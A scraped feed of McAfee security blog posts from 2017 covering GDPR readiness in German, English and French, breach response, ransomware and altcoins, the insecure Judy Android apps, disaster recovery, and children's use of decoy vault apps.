  • Ausschaltung aufkommender Bedrohungen.Malware-Infektionen und die Ausnutzung von Anwendungsschwachstellen sind wichtige Angriffsvektoren, die zu einer Datenexfiltration führen. Fortschrittlicher Bedrohungsschutz auf Endgeräten und in Netzwerken kann die Angriffsfläche für bekannte und unbekannte Malware wesentlich verringern. In Sicherheitskontrollzentren müssen Bedrohungsdaten von mehreren Quellen genutzt werden, um proaktiv nach Angreifern zu suchen.
  • Schutz wichtiger Daten.Ein gutes Datensicherheitsprogramm muss die Möglichkeit bieten, Daten zu schützen und versehentliche Datenverluste oder böswillige Diebstahlversuche zu erkennen und dagegen vorzugehen. Verschlüsselungstechnologien sowie Technologien zum Schutz vor Datenkompromittierung sind überaus wichtig, um versehentliche Datenverluste zu verhindern. In den Sicherheitskontrollzentren sind SIEM-Lösungen in Kombination mit erweiterten Analysen des Nutzerverhaltens wichtige Faktoren bei der Erkennung und Untersuchung von Insider-Bedrohungen.
  • Schutz von Cloud-Umgebungen.Software-as-a-Service (SaaS) and Cloud-gehostete Anwendungen stellen besondere Herausforderungen bei der Vorbereitung auf die DSGVO dar. Viele Unternehmen nutzen jedoch separate Cloud- und Unternehmens-Sicherheitslösungen, die Lücken bei der Transparenz und Sicherheit mit sich bringen können. Wie wäre es denn mit einem einheitlichen Sicherheitssystem, das eine problemlose Erweiterung der Schutz-, Erkennungs- und Korrekturfunktionen für Cloud-Umgebungen ermöglicht?
  • Optimierung der Sicherheitsprozesse. Viele Sicherheitskontrollzentren haben nicht die Möglichkeit, Datenkompromittierungen zu erkennen und entsprechend darauf zu reagieren. Eine kritische Anforderung hinsichtlich der Vorbereitung auf die DSGVO ist die Fähigkeit, Vorfälle innerhalb von drei Tagen zu melden. Daher ist es unerlässlich, innerhalb von Sicherheitsprozessen Playbooks zu Datenkompromittierungen zu entwickeln. Zudem können Orchestrierungstechnologien bei der Schließung von Lücken und einer beschleunigten Reaktion auf Vorfälle helfen.

 

Dies sind meine empfohlenen Rahmenbedingungen, die bei den vier Dimensionen der Sicherheitsstrategie beginnen, um eine Kultur des Datenschutzes und der konzeptionellen Sicherheit zu schaffen.

In der zweiten Hälfte der Rahmenbedingungen wird gezeigt, wie mit dem Thema Sicherheit umgegangen werden muss, um die gewünschten Ergebnisse zu erzielen und für die DSGVO gerüstet zu sein.

Dies sollte bei Sicherheitsverantwortlichen und Führungskräften in Unternehmen in diesem Jahr im Vordergrund stehen. Sie sollten Investitionen priorisieren und neue Programme oder Lösungen implementieren, um sicherzustellen, dass das Unternehmen den verschärften regulatorischen Rahmenbedingungen gewachsen ist.

Wie bereit sind Sie?

The post Vorbereitung auf die Datenschutz-Grundverordnung 2017, Teil 2: Schaffung einer Kultur des Datenschutzes und der konzeptionellen Sicherheit appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-2-schaffung-einer-kultur-des-datenschutzes-und-der-konzeptionellen-sicherheit/feed/ 0
Caught in the breach – what to do first https://securingtomorrow.mcafee.com/business/optimize-operations/caught-in-the-breach-what-to-do-first/ Wed, 31 May 2017 21:50:59 +0000 https://securingtomorrow.mcafee.com/?p=74648 Security experts have been saying for more than a decade that it is “not if, but when” an organization will be hacked. So, the more relevant question, posed in the title of a panel discussion at May 24’s MIT Sloan CIO Symposium is: “You Were Hacked: Now What?” Indeed, given that there is no sure way …

The post Caught in the breach – what to do first appeared first on McAfee Blogs.

]]>
Security experts have been saying for more than a decade that it is “not if, but when” an organization will be hacked. So, the more relevant question, posed in the title of a panel discussion at May 24’s MIT Sloan CIO Symposium is: “You Were Hacked: Now What?”

Indeed, given that there is no sure way to prevent every intrusion by so-called, “determined adversaries,” much of the defense playbook has shifted to incident response (IR). And that, said panelists, if done quickly and correctly, can mitigate the damage attackers can cause, even if they make it inside a network.

“Hacking is an action,” said Andrew Stanley, CISO of Phillips. “A breach is the outcome. So we spend more time on the hack than the breach. We want to know how, why – what was the intent – when and where. That’s what the C-suite wants to know more than the nature of the breach.” Answering those questions is what helps make the response, and therefore containing the damage, more effective, he added.

James Lugabihl, director, execution assurance at ADP, agreed that the key to limiting the damage of a breach is, “how quickly can you respond and stop it.” He said it is also crucial not to react without complete information. “It’s almost like a disaster scenario you see on the news,” he said. “It takes a lot of patience not to react too quickly. A lot of my information may be incomplete, and it’s important to get everybody staged. It isn’t a sprint, it’s a marathon. You need time to recognize data so you’re not reacting to information that’s incomplete.” With the right information, he said, it is possible to “track and eradicate” malicious intruders, plus see what their intentions were.

Both panelists said legal notification requirements can vary by country, or even by state, and if it is not a mandate, notifying law enforcement is something they will sometimes try to avoid. “Executives don’t like it, because it becomes a matter of public record,” Stanley said. “But it also can affect people’s privacy, and you don’t want to become an arm of the government.”

Aside from who needs to know and who legally must know, Stanley said collecting information that can help with the response is the most important thing to do. “It’s about intent,” he said. “If all (phishing) emails are going to one location, that’s an attack. So we need to ask: What do we do there? What’s the target?”

Both also said they conduct tabletop exercises, pen testing and simulated crises to practice their IR for when the real thing happens. But, as Lugabihl noted, “it takes perfect practice to make a perfect response. Bad practice makes bad response.”

To a question from moderator Keri Pearlson, executive director of the MIT Interdisciplinary Consortium on Improving Critical Cybersecurity Infrastructure, about how to cope with the reality that “people are the weakest link” in the security chain, Lugabihl said workers are not entirely at fault. “We haven’t fostered an environment that lets them do their jobs,” he said. “I’ve seen security professionals fall for phishing – those are getting more sophisticated. We just need to encourage them to report it. We need to help make things easier and more transparent.”

 

This article was written by Taylor Armerding from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Caught in the breach – what to do first appeared first on McAfee Blogs.

]]>
Preparing for GDPR in 2017, Part 2: Creating a Culture of Privacy and Security by Design https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-2-creating-culture-privacy-security-design/ https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-2-creating-culture-privacy-security-design/#respond Wed, 31 May 2017 21:32:15 +0000 https://securingtomorrow.mcafee.com/?p=74596 This is the second in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017. (Part 1, 3, 4) Don’t think about the new EU General Data Protection Regulation (GDPR) in terms of fines. Think about creating a culture of privacy and security by design. What does that …

The post Preparing for GDPR in 2017, Part 2: Creating a Culture of Privacy and Security by Design appeared first on McAfee Blogs.

]]>
This is the second in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017. (Part 1, 3, 4)

Don’t think about the new EU General Data Protection Regulation (GDPR) in terms of fines. Think about creating a culture of privacy and security by design.

What does that mean? While such an approach will encompass personal data protection and cybersecurity, this is about much more than personal data and technology. Just because the ‘D’ in GDPR stands for ‘data’, you can’t just turn on a data loss prevention (DLP) solution and consider the job done. Even with a technology-led approach – and don’t get me wrong, adopting more DLP tech is a good thing – any organisation still has to think about the business processes it affects, the breach detection processes it affects, the people who will operate that technology, and those individuals whose data is processed – as they face personal risk.

Sticking with the people for a moment, across an organisation you need to see how various roles are affected. That means from the general user, to privileged users to senior executives or leaders.

Then with the business processes, what are the data flows and what’s affected by the collection, storage and usage of personal data? The proper technology and procedural controls have to be put in place.

So the way to do all this is to adopt frameworks like those that follow here. First think of security strategy in terms of governance, people, processes and technology. Then consider the security outcomes you need to be GDPR-ready, and the relevant solutions.

Reviewing Security Strategy:

This new regulation certainly raises the bar for data protection within an organisation. Preparing for the various protection and reporting conditions of the new regulation – within an interconnected, fast-moving digital enterprise – demands a holistic review of security strategy across governance, people, process and technology:

Governance

In many circumstances, preparing for the new regulation requires the appointment of a data protection officer who is responsible for organisational compliance and communication with supervisory authorities. Moreover, given the high fines that can be levied for violations, GDPR has board-level attention, which most likely requires new internal reporting structures and a continuous compliance culture. These structures are essential to developing a successful data protection programme for the long term.

People

Within any organisation, data security is everyone’s responsibility, not just the guys in security ops. It’s essential that all people from executives to users, administrators and developers be educated on how to protect data and ready to challenge when shortcuts are proposed. Making our people part of the solution and not the problem goes a long way in developing a culture of security and privacy by design.

Processes

Several key security and business processes should be reviewed for applicability and current state of capability. This review should take a comprehensive look at data collection, flows, processing, storage and handling to get an understanding of the scope of the issue. Key data protection processes include classification and monitoring, as well as application development and security testing.

Technology

We should think about a security system that allows you to protect data at rest, in motion or in use while enabling rapid detection and response to a breach. Organisations should review whether their current best-of-breed security technology strategy will deliver the effectiveness needed to keep pace with new threats and enable the operational efficiency needed to stay within budget.

Measuring Security Outcomes:

Assessing GDPR-readiness requires a review of the organisation’s current security programme. The following cyber security outcomes are critical to any organisation undergoing digital transformation and are the main pillars of any GDPR-readiness preparations. Your security solutions should enable the technical building blocks at the endpoint, network, cloud and SOC to work together as an orchestrated system that delivers the prevention, detection and response capability necessary to deliver the key outcomes.

Neutralise Emerging Threats

Malware infections and exploits of application vulnerabilities are key attack vectors that lead to data exfiltration. Advanced threat defences at the endpoint and network can harden the attack surfaces against known and unknown malware. In the SOC, leverage threat intelligence from multiple sources to proactively hunt for attackers.

Protect Vital Data

Any good data security programme must have the capability to protect, detect and correct against accidental data loss or malicious theft attempts. Encryption and data loss prevention (DLP) technology are fundamental to preventing accidental data loss incidents. In the SOC, SIEM combined with advanced user behaviour analytics will be the key enablers to identify and investigate insider threats.

Protect Cloud Environments

Software-as-a-service (SaaS) and cloud-hosted applications present particular challenges for GDPR preparations. However, many organisations use separate cloud and enterprise security solutions, which can create gaps in visibility and protection. Think about a unified security system that allows you to extend protection, detection and correction capability to cloud environments easily.

Optimise Security Operations

Many security operations centres lack capabilities for data breach detection and response. A critical requirement in GDPR readiness is being able to report within three days, so it’s essential to develop data breach playbooks within security operations. Additionally, orchestration technologies can help bridge gaps and speed up incident response.

This is my recommended framework, starting with the four dimensions of security strategy to get to a culture of security and privacy by design.

The second half of the framework shows how security must be approached to get the right GDPR-ready outcomes.

Getting ready for the GDPR should be front of mind for enterprise business and security executives this year, who should prioritise investments and implement new programmes or solutions that ensure the business is ready for the enhanced regulatory environment.

How ready are you?

 

The post Preparing for GDPR in 2017, Part 2: Creating a Culture of Privacy and Security by Design appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-2-creating-culture-privacy-security-design/feed/ 0
Beyond Bitcoin for Ransomware https://securingtomorrow.mcafee.com/business/beyond-bitcoin-ransomware/ https://securingtomorrow.mcafee.com/business/beyond-bitcoin-ransomware/#respond Wed, 31 May 2017 20:19:27 +0000 https://securingtomorrow.mcafee.com/?p=74635 Ransomware is bringing Bitcoin into popular culture and raising awareness about cryptocurrencies. In May, the price of Bitcoin surged to over US$2,800 before retreating. It remains the “go to” digital currency for ransomware authors due to its relative anonymity, ease of use, and popularity. As the ability for the public to acquire digital currencies other than Bitcoin …

The post Beyond Bitcoin for Ransomware appeared first on McAfee Blogs.

]]>
Ransomware is bringing Bitcoin into popular culture and raising awareness about cryptocurrencies. In May, the price of Bitcoin surged to over US$2,800 before retreating. It remains the “go to” digital currency for ransomware authors due to its relative anonymity, ease of use, and popularity.

As the ability for the public to acquire digital currencies other than Bitcoin becomes easier, cybercriminals will look to these alternatives to Bitcoin for funding malicious activities. In fact, hundreds of cryptocurrencies are now available on public markets. Some of these emerging “altcoins” offer improvements over Bitcoin in features cybercriminals value, such as anonymity and privacy, and are already used in illicit transactions on the dark web. Monero, for example, is gaining popularity on the dark web. Dash and Zcash also focus on techniques to keep financial transactions private and anonymous.

Arguably, the most popular cryptocurrency after Bitcoin is Ethereum. However, unlike Bitcoin, Ethereum is also a platform that allows developers to build applications – called “smart contracts” – that execute as part of a blockchain. Numerous industry efforts make interacting with the Ethereum blockchain easier for developers:

As development platforms for building applications and products on public blockchains evolve, the ability to leverage these for criminal activity will also increase. Cybercriminals will soon start building applications on blockchains, such as Ethereum, to automate the process of payment collection. For example, cybercriminals could build smart contracts into their ransomware packages. Encryption keys could be created and released on infection, and after subsequent payment to the smart contract, the package could ‘self-destruct’ and remove itself from the blockchain.

As with any new technology that holds the promise of solving important and legitimate technical problems, that same technology can be used to enable illegitimate activity. Understanding what that activity can be, where the potential for misuse is, and how to identify it when it occurs is going to be increasingly important for security professionals, especially as blockchain development becomes more prevalent in enterprise organizations.

The post Beyond Bitcoin for Ransomware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/beyond-bitcoin-ransomware/feed/ 0
Android Devices Potentially Compromised by Judy App Weaknesses https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/android-devices-compromised-judy-apps/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/android-devices-compromised-judy-apps/#respond Wed, 31 May 2017 17:12:26 +0000 https://securingtomorrow.mcafee.com/?p=74599 We’ve seen cyberattacks truly embody their names as of late, given how the massive WannaCry ransomware attack left quite a few in tears. Now, we have Judy, a set of insecure gaming apps, which are aptly named after their “cutesy” main character. And though these 41 Android apps are characterized by the sweet avatar, the …

The post Android Devices Potentially Compromised by Judy App Weaknesses appeared first on McAfee Blogs.

]]>
We’ve seen cyberattacks truly embody their names as of late, given how the massive WannaCry ransomware attack left quite a few in tears. Now, we have Judy, a set of insecure gaming apps, which are aptly named after their “cutesy” main character. And though these 41 Android apps are characterized by the sweet avatar, the security complications they carry are anything but cute.

These Judy apps are poorly designed, which has created security gaps and makes them subject to abuse. Leveraging this lack of security, cybercriminals can manipulate the apps to auto-click on banners from Google ads, which generates revenue for the crooks behind the scheme.

So now the question is – how do mobile users stay safe? First off, it’s important for developers to create apps with security in mind. Regardless, Google has removed all of the Judy apps, which came from Korean developer Kiniwini, from the Google Play store. But remember that these apps are also available on iOS as well. So, all mobile users need to make sure they’re on the lookout. Therefore, in order to protect yourself from risky apps, such as the Judy apps, follow these tips:

-Do your homework. Before you even download an app, make sure you head to the reviews section of an app store first. Take the time to sift through the reviews, and keep an eye out for ones that mention that the app has had issues with security or might be a bit sketchy. When in doubt, don’t download any app that is remotely questionable.

-Keep apps up-to-date. The developer behind the Judy applications will soon likely include a security patch in the latest updates for their apps. Therefore, as a good practice, whenever updates are available for any of your applications, make sure to install them immediately.

-Use a mobile security solution. As risky apps continue to persist in both Google’s and Apple’s official app stores, make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Android Devices Potentially Compromised by Judy App Weaknesses appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/android-devices-compromised-judy-apps/feed/ 0
Se préparer au RGPD en 2017 – Deuxième partie : instaurer une culture de la protection de la vie privée et de la sécurité dès la conception https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-deuxieme-partie-instaurer-une-culture-de-la-protection-de-la-vie-privee-et-de-la-securite-des-la-conception/ https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-deuxieme-partie-instaurer-une-culture-de-la-protection-de-la-vie-privee-et-de-la-securite-des-la-conception/#respond Wed, 31 May 2017 15:34:47 +0000 https://securingtomorrow.mcafee.com/?p=75034 Cet article de blog est le deuxième d’une série dont le but est d’aider les dirigeants d’entreprise et les cadres responsables de la sécurité à se préparer au RGPD tout au long de l’année 2017.   Les amendes… Sans doute le nouveau règlement général sur la protection des données de l’Union européenne est-il pour vous une …

The post Se préparer au RGPD en 2017 – Deuxième partie : instaurer une culture de la protection de la vie privée et de la sécurité dès la conception appeared first on McAfee Blogs.

]]>
Cet article de blog est le deuxième d’une série dont le but est d’aider les dirigeants d’entreprise et les cadres responsables de la sécurité à se préparer au RGPD tout au long de l’année 2017.

 

Les amendes… Sans doute le nouveau règlement général sur la protection des données de l’Union européenne est-il pour vous une source d’angoisse. Pourtant, vous devriez saisir l’occasion pour instaurer une culture de la protection de la vie privée et de la sécurité dès la conception.

Qu’est-ce que cela signifie ? Certes, la protection des données à caractère personnel et la cybersécurité sont au cœur de cette approche. Mais cela ne se résume pas aux données et aux technologies, loin de là. Ce n’est pas parce que le « D » de RGPD signifie « données » qu’il vous suffira de déployer une solution de prévention des fuites de données (DLP) pour que le tour soit joué. Même si l’approche est technologique (et comprenez-moi bien, je n’ai pas dit qu’adopter d’autres technologies DLP n’était pas une bonne chose), toute entreprise doit réfléchir à plusieurs éléments. Pensez aux processus métier et aux processus de détection des violations qu’elle affecte, au personnel chargé de faire fonctionner ces technologies et aux citoyens dont les données sont traitées — car ces personnes encourent des risques sur le plan personnel.

En ce qui concerne le personnel, vous devez déterminer l’impact qu’auront les technologies sur les divers rôles au sein de l’entreprise. Autrement dit, les utilisateurs normaux, ceux avec privilèges, les cadres dirigeants et les dirigeants.

Viennent ensuite les processus métier. Quels sont les flux de données ? Et sur quoi la collecte, la conservation et l’utilisation des données à caractère personnel ont-elles une incidence ? Vous devez prendre les mesures appropriées en termes de technologies et de procédures.

Je vous recommande donc d’adopter un cadre tel celui décrit ci-dessous. Tout d’abord, lorsque vous songez à votre stratégie de sécurité, pensez gouvernance, ressources humaines, processus et technologies. Ensuite, réfléchissez aux objectifs de sécurité à atteindre pour être préparé au RGPD, ainsi qu’aux solutions à mettre en œuvre.

 

Refonte de votre stratégie de sécurité

Il est clair que le nouveau règlement place la barre plus haut en termes de protection des données. Pour l’entreprise numérique hyperdynamique et interconnectée, se préparer aux nouvelles exigences de protection et de reddition de comptes ne sera pas simple. Cela nécessitera un remaniement global de différents aspects de la stratégie de sécurité : gouvernance, ressources humaines, processus et technologies.

  • Bien souvent, pour préparer l’entreprise à la mise en œuvre de ce nouveau règlement, il sera nécessaire de nommer un délégué à la protection des données ; celui-ci sera responsable de la conformité opérationnelle et de la communication avec les autorités de contrôle. De plus, au vu des montants potentiels des amendes en cas de non-respect du RGPD, celui-ci suscite l’intérêt des conseils d’administration. Il nécessitera sans doute la mise en place de nouvelles structures internes de rapport et le développement d’une véritable culture de respect de la conformité. Ces structures sont indispensables à la création d’un programme de protection des données performant sur le long terme.
  • Ressources humaines.Au sein de l’entreprise, la protection des données est la responsabilité de chacun, pas seulement de l’équipe de sécurité. Il est essentiel que tous les intervenants, depuis les cadres dirigeants jusqu’aux utilisateurs, en passant par les administrateurs et les développeurs, soient formés à la protection des données et prêts à remettre en question les mesures de « raccourci » qui seraient proposées. Et les intégrer à la solution, plutôt que voir en eux un problème, contribue grandement à l’instauration d’une culture de la protection de la vie privée et de la sécurité dès la conception.
  • Plusieurs processus métier et de sécurité fondamentaux devront être analysés pour vérifier leur adéquation et évaluer leurs fonctions. Pour cela, il faudra examiner de façon approfondie la collecte, les flux, le traitement, la conservation et la gestion des données pour bien comprendre la portée du problème. Les processus clés de protection des données incluent notamment la classification et la surveillance, ainsi que le développement d’applications et les tests de sécurité.
  • Il convient d’envisager un système de sécurité permettant non seulement de protéger les données au repos, en mouvement et en cours d’utilisation, mais aussi de détecter rapidement les violations tout en limitant le délai de réponse. Les entreprises doivent déterminer si la stratégie de sécurité en place s’appuie sur des technologies suffisamment à la pointe et efficaces pour faire face aux menaces récentes et garantir l’efficacité opérationnelle nécessaire afin d’éviter tout dépassement de budget.

 

Mesure de l’efficacité de la sécurité

Pour évaluer son degré de préparation au RGPD, une entreprise doit examiner son programme de sécurité. Toute entreprise engagée dans un projet de transformation numérique doit impérativement disposer d’un dispositif de cybersécurité capable d’assurer les niveaux de fonctions et de performances ci-dessous, qui constituent les principaux piliers d’une bonne préparation au RGPD. Vos solutions de sécurité doivent permettre aux composants techniques situés au niveau du terminal, du réseau, du cloud et du centre d’opérations de sécurité (SOC) de fonctionner ensemble comme un système orchestré. Ce dernier doit offrir les fonctions de prévention, de détection et de réponse nécessaires à la réalisation des objectifs d’efficacité attendus.

  • Neutralisation des menaces émergentes.Les infections par des logiciels malveillants (malware) et les exploits tirant parti des vulnérabilités des applications comptent parmi les principaux vecteurs d’attaques qui conduisent à l’exfiltration de données. Des mécanismes de défense contre les menaces avancées déployés sur les terminaux et le réseau permettent de réduire la surface d’attaque en renforçant la protection contre les logiciels malveillants connus et inconnus. Au niveau du SOC, tirez parti d’une cyberveille sur les menaces issue de plusieurs sources pour traquer de façon proactive les auteurs d’attaques.
  • Protection des données critiques.Pour être efficace, un programme de sécurité des données doit permettre, d’une part, de détecter et de bloquer les fuites de données accidentelles et les tentatives de vol de données de nature malveillante et, d’autre part, d’appliquer les mesures correctives requises. Des technologies de chiffrement et de prévention des fuites de données (DLP) sont essentielles pour empêcher que des données ne s’échappent de l’entreprise par accident. Au sein du SOC, une solution SIEM et l’analyse avancée du comportement des utilisateurs offrent la combinaison stratégique nécessaire à l’identification et à l’analyse des menaces internes.
  • Protection des environnements de cloud.Les applications SaaS (Software-as-a-Service) et hébergées dans le cloud posent des difficultés particulières pour la préparation au RGPD. Bien souvent cependant, des solutions de sécurité d’entreprise et dans le cloud distinctes sont utilisées, ce qui peut créer des failles au niveau de la visibilité et de la protection. Envisagez un système de sécurité unifié qui vous permette d’étendre facilement les fonctions de protection, de détection et de correction aux environnements de cloud.
  • Optimisation des opérations de sécurité. De nombreux centres des opérations de sécurité ne disposent pas des fonctions nécessaires pour détecter les violations de données et réagir efficacement. Étant donné qu’une des exigences primordiales de la préparation au RGPD prévoit que l’entreprise notifie toute violation de données dans les trois jours, il est essentiel de développer pour ces centres un plan tactique de gestion de ces incidents. Des technologies d’orchestration peuvent également aider à colmater les failles et à accélérer la réponse aux incidents.

 

Tel est le cadre que je recommande : commencer par les quatre dimensions de la stratégie de sécurité pour parvenir à une culture de la sécurité et de la protection de la vie privée dès la conception.

La deuxième partie de ce cadre décrit la manière dont la sécurité doit être abordée pour obtenir les résultats voulus en termes de préparation au RGPD.

Se préparer pour l’entrée en vigueur du RGPD doit inévitablement compter parmi les grandes priorités des responsables de la sécurité et des cadres dirigeants tout au long de l’année. Ils devront orienter leurs investissements en conséquence et mettre en œuvre de nouveaux programmes ou solutions qui permettront à leur entreprise d’être en phase avec ce nouvel environnement réglementaire renforcé.

Dans quelle mesure êtes-vous prêt ?

The post Se préparer au RGPD en 2017 – Deuxième partie : instaurer une culture de la protection de la vie privée et de la sécurité dès la conception appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-deuxieme-partie-instaurer-une-culture-de-la-protection-de-la-vie-privee-et-de-la-securite-des-la-conception/feed/ 0
Avoiding a data disaster: could your business recover from human error? https://securingtomorrow.mcafee.com/business/safeguard-data/avoiding-a-data-disaster-could-your-business-recover-from-human-error/ Tue, 30 May 2017 19:11:23 +0000 https://securingtomorrow.mcafee.com/?p=74586 “Data.” Ask senior management at any major organization to name their most critical business asset and they’ll likely respond with that one word. As such, developing a disaster recovery strategy – both for data backup and restoration – is a central part of planning for business continuity management at any organization. It is essential that …

The post Avoiding a data disaster: could your business recover from human error? appeared first on McAfee Blogs.

]]>
“Data.” Ask senior management at any major organization to name their most critical business asset and they’ll likely respond with that one word.

As such, developing a disaster recovery strategy – both for data backup and restoration – is a central part of planning for business continuity management at any organization. It is essential that your company and the vendors you work with can protect against data loss and ensure data integrity in the event of catastrophic failure – whether from an external event or human error.

Think about this: What would you do if one of your trusted database administrators made a mistake that wiped out all of your databases in one fell swoop? Could your business recover?

Backing up data at an off-site data center has long-been a best practice, and that strategy relates more to the disaster recovery (DR) component of business continuity management (BCM). DR and BCM go hand in hand, but there is a difference: BCM is about making sure the enterprise can resume business quickly after a disaster. Disaster recovery (DR) falls within the continuity plan and specifically addresses protecting IT infrastructure – including systems and databases – that organizations need to operate.

While replicating data off-site is smart, it doesn’t fully address human error, which can be an even greater risk for businesses than a major external catastrophe. The human error factor is why a two-pronged approach to disaster recovery makes sense. Backing up customer data off-site means it is protected from a major uncontrollable event like a natural disaster. But a local strategy is also essential to ensure there are well-trained people, defined processes and the right technology in place to reduce the risk of human error.

Think automation and consider the cloud

Automation of backups (making a copy of the data), replication (copying and then moving data to another location), off-site verification and restoration processes are the most effective ways to address the risk of human error.

Storage replication mirrors your most important data sets between your primary and DR site or service. Most, if not all, mainstream storage vendors provide this functionality out of the box or for a license fee. The replication should support scheduling replication events, mirroring data sets against your recovery point objective (RPO) and archival services that allow systems administrators to setup policies that match your business continuity objectives (e.g., six months of offsite monthly archives). And, for added protection, consider FIPs certified encryption solutions at the disk or controller level, which protects your most critical and sensitive data against accidental exposure by encrypting your data at rest.

You can also leverage WAN Acceleration technologies to accelerate your offsite replication and/or backups by maximizing the efficiency of your data replication or backup streams and saving you costs in both bandwidth as well as time to replicate your changes offsite. Used in combination with storage replication this makes for a very secure and resilient architectural approach to data protection, and in some cases, can help lower recurring expenses.

Another choice, in lieu of storage replication availability, is to leverage your persistent storage solutions (RDBMS or NoSQL) to replicate changes in real time as most best-of-breed technologies come with data replication and backup services by default. Spending the time upfront to understand which solution is most effective from a cost and execution standpoint is advisable as there are bound to be differences driven by compliance requirements.

In addition, investing in automation tools and services can greatly improve your response to an unplanned disaster, but does require a solid foundation of configuration management standards to successfully deploy and validate your configuration items (network hardware, storage appliances, server technology, etc.). A dedicated team of DevOps resources can be most effective in this area as Infrastructure as Code continues to gain widespread adoption. Imagine for a moment that instead of troubleshooting failures, you can simply re-provision to a previously certified configuration. Not only are you proving your ability to respond in the face of a disaster, but you may even benefit from automating your infrastructure builds, where applicable, by re-purposing valuable time and resources for other important work.

If you have the right automation in place, with an expected input and an expected output verified through repeatable processes, you mitigate the risk that an engineer or a database administrator will inadvertently push the wrong button and create a data disaster.

The traditional approach is to invest in server, network and storage hardware, and co-location. But you should also consider the major cloud services – Amazon’s AWS, Microsoft Azure or Google Cloud Platform – that allow you to back up your most important data straight to the cloud. It’s another way of investing in disaster recovery without necessarily incurring the cost of buying data centers or hardware.

Companies of all sizes face pressure from investors and customers who want assurance that sensitive data will be protected correctly no matter what happens – from credit card numbers to personally identifiable information (PII). As a cloud-based software provider, I know how important it is that customers have confidence that their data are protected at all times.

Following are some top questions to ask cloud vendors:

Are they investing in automation? Your vendor should be investing in automation to support its own DR plan. A vendor’s own fortified technology foundation and strong security framework can help you meet your own stringent data requirements.

Are they seeking third-party assessments? Ask about their verification processes. They should be engaging an independent assessor twice yearly to verify the efficacy of BCM and DR processes for both U.S. and non-U.S. operations. Testing them twice a year is important because the software space is always changing, and these assessments help to ensure that BCM and DR plans stay fresh.

Are they making assessor reports available to you? Any vendor should make the independent assessor’s reports available to customers – ask to see them. Documentation of specific security certifications can provide additional evidence that their BCM and DR processes are effective.

Are they focused on recovery time? A recovery point objective (RPO) is the maximum targeted period in which data might be lost due to a major incident. Ask where your vendor falls in its industry segment. Similarly, ask about their recovery time objective (RTO) – the targeted duration of time within which they can restore our service after a disaster. Many providers guarantee a two- to three-day average restoration time frame.

Just as you are concerned about data loss and integrity for your own business, you should seek the same from any vendor. Test and refine your own processes, and make sure your vendors do too.

 

This article was written by Mark Goldin from NetworkWorld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Avoiding a data disaster: could your business recover from human error? appeared first on McAfee Blogs.

]]>
Why Kids Use Secret Decoy Apps and Why Parents Should Care https://securingtomorrow.mcafee.com/consumer/family-safety/kids-use-secret-decoy-apps-parents-care/ https://securingtomorrow.mcafee.com/consumer/family-safety/kids-use-secret-decoy-apps-parents-care/#respond Tue, 30 May 2017 14:00:35 +0000 https://securingtomorrow.mcafee.com/?p=74517 Kids have been locking their diaries and hiding top secret shoe long before even Sandy Olssen had a crush on Danny Zuko. The need for more and more privacy as they mature is a natural part of growing up. Today, however, some kids hide their private lives behind locked decoy apps catapulting those harmless secret …

The post Why Kids Use Secret Decoy Apps and Why Parents Should Care appeared first on McAfee Blogs.

]]>
Decoy AppsKids have been locking their diaries and hiding top secret shoe long before even Sandy Olssen had a crush on Danny Zuko. The need for more and more privacy as they mature is a natural part of growing up. Today, however, some kids hide their private lives behind locked decoy apps catapulting those harmless secret crushes to a whole new level.

A decoy app is what it sounds like; it’s a mobile app designed for the purpose of hiding something. Decoy apps are also called vault, secret, and ghost apps and make it tough for parents to know whether or not their kids are taking and sharing risky photos with peers since the apps are disguised as an everyday app.

A decoy app may look like a calculator, a game, or even a utilities icon, but it’s actually a place to tuck away content a phone user doesn’t want anyone to find. Kids use decoy apps to store screenshots of racy conversations, nude photos, pornographic videos, and party photos that are simply too risky to keep in a regular photo folder that mom or dad may find. One case in Pennsylvania documents vault apps at the center of sexting and cyberbullying case in a middle school.

Adults and Decoy AppsDecoy Apps

Many adults are also well acquainted with decoy apps. It’s no surprise adults use these stealth apps to store private business activity, passwords to secret accounts, inappropriate photos, and content related to extramarital affairs. Apps such as Vaulty Stocks looks like a Wall Street stock market tracker, but in reality, it’s an app designed to keep private photos and videos hidden from nosey spouses.

How to Spot a Decoy App

If you want to get an idea of how many of these kinds of decoy apps exist go to your iOS or Android store app and search secret apps or decoy apps and you will get your fill of the many icons that are in place to hide someone’s private digital life.

Once you know to look for these apps designed to look like a calculator, a safe, a game, a note or even a shopping list app, you are well on your way.

A decoy app can’t be opened without a code or password specified by the original user. Some of these decoy apps such as Keep Safe Private Photo Vault actually have two layers of security (two passwords) designed to throw off a parent who can open the first level and find harmless content. According to the app description on the Google Play store, “Keepsafe secures personal photos and videos by locking them down with PIN protection, fingerprint authentication, and military-grade encryption. It’s the best place for hiding personal pictures and videos.” Further privacy is detailed with the promise of a face-down auto lock feature, “In a tight situation? Have Keepsafe lock itself when your device faces downward.” Another app, The Secret Calculator, description states: “Don’t worry about the icon. It will become a standard calculator icon. No one will ever notice.”Decoy Apps

Other features highlighted in the Keepsafe app description include:

  • Break-In Alerts: Takes photos of intruders and tracks break-in attempts
  • Secret Door: Disguises your Keepsafe as another app
